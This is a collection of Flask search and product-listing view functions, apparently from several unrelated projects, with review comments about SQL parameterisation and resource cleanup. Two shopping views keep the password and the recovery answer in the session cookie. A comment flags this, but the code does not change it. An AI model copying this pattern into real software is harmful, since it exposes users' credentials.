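def search():
    """Render the journal search page.

    Every Journal is listed on both GET and POST. The submitted keyword is
    validated but not yet applied as a filter, so the listing is the same
    either way; the previously unused local holding it has been dropped.

    Returns:
        The rendered ``search/search.html`` template.
    """
    journals = Journal.query.all()
    form = SearchForm(request.form)
    if request.method == 'POST':
        # validate() is still called so the template can show form.errors;
        # form.keyword.data is intentionally not read until filtering exists.
        form.validate()
    return render_template('search/search.html', journals=journals, form=form)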
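def search():
    """Render the album/artist search page.

    Every Album and Artist is listed on both GET and POST. The submitted
    keyword is validated but not yet applied as a filter, so the listing is
    the same either way; the previously unused local holding it has been
    dropped.

    Returns:
        The rendered ``search/search.html`` template.
    """
    albums = Album.query.all()
    artists = Artist.query.all()
    form = SearchForm(request.form)
    if request.method == 'POST':
        # validate() is still called so the template can show form.errors;
        # form.keyword.data is intentionally not read until filtering exists.
        form.validate()
    return render_template('search/search.html', albums=albums, artists=artists, form=form)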
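def Search(product):
    """Render the product search page for *product* (exact name match).

    Args:
        product: product name taken from the URL; treated as untrusted data.

    Returns:
        The rendered ``shopping/Search.html`` on GET, or a redirect back to
        this view with the submitted search term on POST.
    """
    if 'username' in session:
        # NOTE(review): the session also carries the password and the
        # recovery answer; User is defined elsewhere — confirm these really
        # need to live in the session cookie.
        user = User(session['username'], session['email'], session['password'],
                    session['question'], session['answer'])
    else:
        user = None

    # Parameterised lookup: `product` must never be interpolated into the
    # statement text. The earlier .format() version let a crafted name
    # rewrite the query (UNION reads of sqlite_master and other tables);
    # binding it as a parameter closes that. The debug print of the rows
    # was removed as well — it wrote product data to stdout on every request.
    conn = sqlite3.connect(os.path.join(file_directory, "storage.db"))
    try:
        c = conn.cursor()
        c.execute("SELECT rowid, * FROM products WHERE name = ?", (product,))
        results = c.fetchall()
    finally:
        # Release the connection even when the query raises.
        conn.close()

    # Search Form
    form = SearchForm(request.form)
    if request.method == "POST":
        # The term is passed through the URL; url_for() encodes it and the
        # bound query above means it is never trusted as SQL.
        return redirect(url_for('shopping.Search', product=form.Search.data))
    return render_template("shopping/Search.html", user=user, products=results,
                           search=product, form=form)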
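def Products():
    """Render the product listing together with the search form.

    Returns:
        The rendered ``shopping/Products.html`` on GET, or a redirect to
        ``shopping.Search`` with the submitted term on POST.
    """
    if 'username' in session:
        # NOTE(review): session carries password and recovery answer as
        # well; User is defined elsewhere — confirm this is intended.
        user = User(session['username'], session['email'], session['password'],
                    session['question'], session['answer'])
    else:
        user = None

    conn = sqlite3.connect(os.path.join(file_directory, "storage.db"))
    try:
        c = conn.cursor()
        # Static statement: no request data reaches the SQL text.
        c.execute("SELECT rowid, * FROM products")
        products = c.fetchall()
    finally:
        # Previously the connection leaked if fetchall()/execute() raised.
        conn.close()

    search = SearchForm(request.form)
    if request.method == "POST":
        # The term goes to Search via the URL; url_for() encodes it and
        # Search must treat it as untrusted input.
        return redirect(url_for('shopping.Search', product=search.Search.data))
    return render_template("shopping/Products.html", user=user, form=search, products=products)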
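def Products():
    """Render the product listing together with the search form.

    The page is public: if there is no logged-in user (``current_user`` has
    no usable ``get_username``), ``user`` is passed as ``None``.

    Returns:
        The rendered ``shopping/Products.html`` on GET, or a redirect to
        ``shopping.Search`` with the submitted term on POST.
    """
    try:
        current_user.get_username()
        user = current_user
    except Exception:
        # Was a bare `except:`, which also swallowed KeyboardInterrupt and
        # SystemExit; anonymous visitors simply get no user object.
        user = None

    conn = sqlite3.connect(os.path.join(file_directory, "storage.db"))
    try:
        c = conn.cursor()
        # Static statement: no request data reaches the SQL text.
        c.execute("SELECT * FROM products")
        products = c.fetchall()
    finally:
        # Previously the connection leaked if the query raised.
        conn.close()

    search = SearchForm(request.form)
    if request.method == "POST":
        # The term goes to Search via the URL; url_for() encodes it.
        return redirect(url_for('shopping.Search', product=search.Search.data))
    return render_template("shopping/Products.html", user=user, form=search, products=products)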
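def home():
    """Render the home page: the search form plus five random active beers.

    On POST the search type/text are stored in the session and the request
    is redirected to ``searchResults``.

    Returns:
        The rendered ``home.html`` template, or a redirect on POST.
    """
    # Get the results from the forms
    form = SearchForm(request.form)
    if request.method == 'POST':
        # Set form values to session cookie
        session['searchType'] = form.searchType.data
        session['searchText'] = form.searchText.data
        return redirect(url_for('searchResults'))

    # Draw 5 *distinct* random beer ids. The earlier round(random()*253)
    # sampled with replacement, so the IN list could repeat an id and the
    # page showed fewer than 5 rows. The upper bound keeps the previous
    # hard-coded value — TODO confirm it matches the real beers.beer_id range.
    max_beer_id = 253
    rand_beer_ids = random.sample(range(max_beer_id + 1), 5)

    # Get 5 beers from the beers table. Only the locally generated ints are
    # substituted here, never request data, so the client cannot influence
    # the statement text.
    query = """SELECT beers.beer_id, beers.name, beers.abv, beer_types.name, brewers.name FROM beers INNER JOIN brewers ON beers.brewer_id = brewers.brewer_id INNER JOIN beer_types ON beers.type_id = beer_types.type_id WHERE beer_id IN (%s,%s,%s,%s,%s) AND beers.inactive = 0;""" % tuple(rand_beer_ids)
    results = db_connect.execute_query(query)

    # Build the rows for the random-beers table; abv is stored as a fraction.
    payload = []
    for result in results:
        abv = result[2] * 100
        payload.append({
            'beer_id': result[0],
            'name': result[1],
            'abv': str(abv) + '%',
            'style': result[3],
            'brewer': result[4],
            'route': 'home',
            'order': '+',
        })
    randBeersTable = RandomTable(payload)
    return render_template('home.html', title='Home', form=form, randBeersTable=randBeersTable)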
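def Search(product):
    """Render the product search page for *product* (exact name match).

    Args:
        product: product name taken from the URL; bound as a query parameter.

    Returns:
        The rendered ``shopping/Search.html`` on GET, or a redirect back to
        this view with the submitted search term on POST.
    """
    try:
        current_user.get_username()
        user = current_user
    except Exception:
        # Was a bare `except:`, which also swallowed KeyboardInterrupt and
        # SystemExit; anonymous visitors simply get no user object.
        user = None

    # For search — `product` is bound with `?`, never interpolated.
    conn = sqlite3.connect(os.path.join(file_directory, "storage.db"))
    try:
        c = conn.cursor()
        c.execute("SELECT rowid, * FROM products WHERE name=? ", (product, ))
        results = c.fetchall()
    finally:
        # Previously the connection leaked if the query raised.
        conn.close()

    # Search Form
    form = SearchForm(request.form)
    if request.method == "POST":
        # The term is passed through the URL; url_for() encodes it.
        return redirect(url_for('shopping.Search', product=form.Search.data))
    return render_template("shopping/Search.html", user=user, products=results,
                           search=product, form=form)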
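def search():
    """Render the device search page.

    On a validated POST a Google map is built, centred on a (currently
    hard-coded) user location, with one marker per device from the test
    payload — the single device sits at the first Hospital's coordinates.
    Otherwise, or when no Hospital row exists yet, only the form is shown.

    Returns:
        The rendered ``search.html`` template.
    """
    form = SearchForm(request.form)
    if not (request.method == 'POST' and form.validate()):
        return render_template('search.html', form=form)

    from flask_googlemaps import Map  # GoogleMaps was imported but never used

    hospital = Hospitals.query.first()
    if hospital is None:
        # Nothing to place on the map; previously this raised on
        # hospital.latitude and returned a 500.
        return render_template('search.html', form=form)

    # NOTE: kensa/chiryo/shikkan/area/from_time/to_time are submitted with
    # the form but not used yet, so they are not read here. The payload
    # below is fixed test data standing in for a JSON request
    # (e.g. { 'user': {'x': ..., 'y': ...}, 'devices': [{'id': ..., 'x': ..., 'y': ..., 'data': ...}, ...] }).
    json_data = {  # for testing
        'user': {
            'x': 35.94149,
            'y': 139.771598,
        },
        'devices': [{
            'id': '0001',
            'x': hospital.latitude,
            'y': hospital.longitude,
            'data': 'something',
        }],
    }

    # user location as a (x, y) tuple
    user_location = (json_data['user']['x'], json_data['user']['y'])

    # Index device info and coordinates by device id. The original read only
    # devices[0]; looping is identical for the one-device test payload and
    # ready for real multi-device input.
    devices_data = {}      # device id -> infobox data
    devices_location = {}  # device id -> (x, y)
    for device in json_data['devices']:
        device_id = str(device['id'])
        devices_data[device_id] = device['data']
        devices_location[device_id] = (device['x'], device['y'])

    circle = {  # draw circle on map (user_location as center)
        'stroke_color': '#0000FF',
        'stroke_opacity': .5,
        'stroke_weight': 5,  # line(stroke) style
        'fill_color': '#FFFFFF',
        'fill_opacity': .2,  # fill style
        'center': {  # set circle to user_location
            'lat': user_location[0],
            'lng': user_location[1],
        },
        'radius': 100,  # circle size in metres (the old comment said 50)
    }

    # Local renamed from `map` so the builtin is not shadowed; the template
    # keyword stays `map`.
    device_map = Map(
        identifier="map",
        varname="map",  # set identifier, varname
        lat=user_location[0],
        lng=user_location[1],  # set map base to user_location
        zoom=12,  # set zoomlevel
        markers=[
            {
                'lat': location[0],
                'lng': location[1],
                'infobox': devices_data[device_id],
            }
            for device_id, location in devices_location.items()
        ],  # one marker per device
        circles=[circle],  # pass circles
    )
    return render_template('search.html', map=device_map, form=form, hospital=hospital)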